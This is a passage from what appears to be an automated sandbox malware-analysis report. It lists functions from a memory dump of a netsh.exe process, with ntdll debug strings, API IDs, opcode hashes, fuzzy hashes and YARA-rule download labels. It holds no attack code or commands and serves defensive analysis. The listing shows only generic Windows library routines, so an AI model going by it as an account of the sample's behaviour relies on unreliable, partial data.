                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 037E4725
                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 037E4787
                                                                                                      • ExecuteOptions, xrefs: 037E46A0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                      • API String ID: 0-484625025
                                                                                                      • Opcode ID: bf53ecfeca6ce405dd623e6825c02c466817c9933be9ab884748f8d905b7c57a
                                                                                                      • Instruction ID: 1e9125de7d0a621d223130c720db8b8c2536f2d98331d07fd25ec38a9436f2ef
                                                                                                      • Opcode Fuzzy Hash: bf53ecfeca6ce405dd623e6825c02c466817c9933be9ab884748f8d905b7c57a
                                                                                                      • Instruction Fuzzy Hash: 4E512935A00759BADF24EBE8DC89FED73B8AF88305F0401D9E505AB181EB719A418F50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 03846940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                      • Instruction ID: 8b2b43d398f8c177298709527d3fa867612b631171b2291e2fd625b7ec1b74f9
                                                                                                      • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                      • Instruction Fuzzy Hash: 88024374608345AFC704CF58C494A6BBBF5EFC9700F148A6DF9998B660EB31E905CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-$0$0
                                                                                                      • API String ID: 1302938615-699404926
                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                      • Instruction ID: b697ad81d9b5d976c129f09e35ac4334dd4f663ffc2d8b37adf70d074b07dc9a
                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                      • Instruction Fuzzy Hash: C8817C74E052499FDF28CE68C8917FEBBB6AF85324F1C425EEC61A7391C6349840DB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 038220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                      • API String ID: 48624451-2819853543
                                                                                                      • Opcode ID: 72c124b8cefce246b3a493eaf24c72e9ab73aa7c9827b76811830a32e242d367
                                                                                                      • Instruction ID: 1cf07dc321a93b1abd728cf48939d905408afd793146d9a07d48870897ccefce
                                                                                                      • Opcode Fuzzy Hash: 72c124b8cefce246b3a493eaf24c72e9ab73aa7c9827b76811830a32e242d367
                                                                                                      • Instruction Fuzzy Hash: 19216576E00229ABDB50DFB9CC44EEEBBF8EF44644F08055AE915D7201E730E9418BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0379F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037E02E7
                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037E02BD
                                                                                                      • RTL: Re-Waiting, xrefs: 037E031E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                      • API String ID: 0-2474120054
                                                                                                      • Opcode ID: 5c02ac4ab8f70fe672760b5ae1426dabb68587e93aa40e51f9a1c4a3927f549e
                                                                                                      • Instruction ID: e0dafd784f0cb904c343b4f0162c545778a66a02aef5fe36405fcc0b0c72414a
                                                                                                      • Opcode Fuzzy Hash: 5c02ac4ab8f70fe672760b5ae1426dabb68587e93aa40e51f9a1c4a3927f549e
                                                                                                      • Instruction Fuzzy Hash: 70E1BF746047419FEB25CF29D884B6AB7E4BF88314F180A6EF5A5CB2E1D7B4D844CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • RTL: Resource at %p, xrefs: 037E7B8E
                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 037E7B7F
                                                                                                      • RTL: Re-Waiting, xrefs: 037E7BAC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 0-871070163
                                                                                                      • Opcode ID: 36262f8985771337f28ae38f3eb31d63d9785f5673845298c6df22eef0eb7a6c
                                                                                                      • Instruction ID: dcfa0507b593d9746b7afdda15c78ffd7f766e59455a052032da70166da03cc2
                                                                                                      • Opcode Fuzzy Hash: 36262f8985771337f28ae38f3eb31d63d9785f5673845298c6df22eef0eb7a6c
                                                                                                      • Instruction Fuzzy Hash: B641D235304B429FC728DE29C840B6AB7E5EF88710F180A1DF95ADB780DB71E8059B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037E728C
                                                                                                      Strings
                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 037E7294
                                                                                                      • RTL: Resource at %p, xrefs: 037E72A3
                                                                                                      • RTL: Re-Waiting, xrefs: 037E72C1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 885266447-605551621
                                                                                                      • Opcode ID: aaae0b9a9e855e72927cc6f1fc5052304f0ad8a95cbf91d7eb1c9226b2fcd280
                                                                                                      • Instruction ID: ef30d59f2ca7fffe872eb4075cf5e1913a3c13d3447b4fe30ca5d4d0ab4204fc
                                                                                                      • Opcode Fuzzy Hash: aaae0b9a9e855e72927cc6f1fc5052304f0ad8a95cbf91d7eb1c9226b2fcd280
                                                                                                      • Instruction Fuzzy Hash: 1241CC36700746AFCB24DE69CC41B6AB7B9FB88710F180619F955EB280DB21E852DBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 03822300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$]:%u
                                                                                                      • API String ID: 48624451-3050659472
                                                                                                      • Opcode ID: e20771e05d882703cae95129619592bae93b7e48c9eba0b2d3e5159bda5abdff
                                                                                                      • Instruction ID: cf40d9ae06ca4305820bbe55b9ab79d0bcf7c5f0d242a7fc1c55963ab9f4d3d1
                                                                                                      • Opcode Fuzzy Hash: e20771e05d882703cae95129619592bae93b7e48c9eba0b2d3e5159bda5abdff
                                                                                                      • Instruction Fuzzy Hash: 7C319A76A002299FDB60DF69DC44FEEB7F8EF44610F840599E849E7140EB30DA449BA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-
                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                      • Instruction ID: baef4346e1eae167a58fa0d530243397b78e668938230c61b0d70da625659392
                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                      • Instruction Fuzzy Hash: 5391A370E0029ADFDF28DE69C881BFEB7B5EF84760F58451AE865EB2C0D73089418715
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 03779126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$@
                                                                                                      • API String ID: 0-1194432280
                                                                                                      • Opcode ID: 3c304e11f747262d075f7ea8c809dee9426cf759e76fb54cd736eaf3e2a7febe
                                                                                                      • Instruction ID: 821ee96b9abc9e076333fdb3a4a759db97f1d824ed3876176fc6449c043f180b
                                                                                                      • Opcode Fuzzy Hash: 3c304e11f747262d075f7ea8c809dee9426cf759e76fb54cd736eaf3e2a7febe
                                                                                                      • Instruction Fuzzy Hash: A1814A75D012699BDB31DB54CC44BEEB7B8AF49710F0445EAEA19B7280E7309E81CFA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%